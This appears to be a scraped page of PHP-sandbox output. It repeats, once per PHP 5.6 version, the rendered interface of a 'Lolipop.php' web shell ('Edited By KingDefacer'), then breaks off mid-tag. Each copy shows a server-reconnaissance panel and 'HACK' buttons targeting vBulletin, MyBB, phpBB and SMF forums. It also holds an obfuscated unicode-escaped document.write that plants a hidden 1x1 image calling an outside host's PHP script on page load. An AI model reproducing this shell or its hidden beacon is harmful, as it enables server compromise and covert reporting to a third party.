type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.16
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' 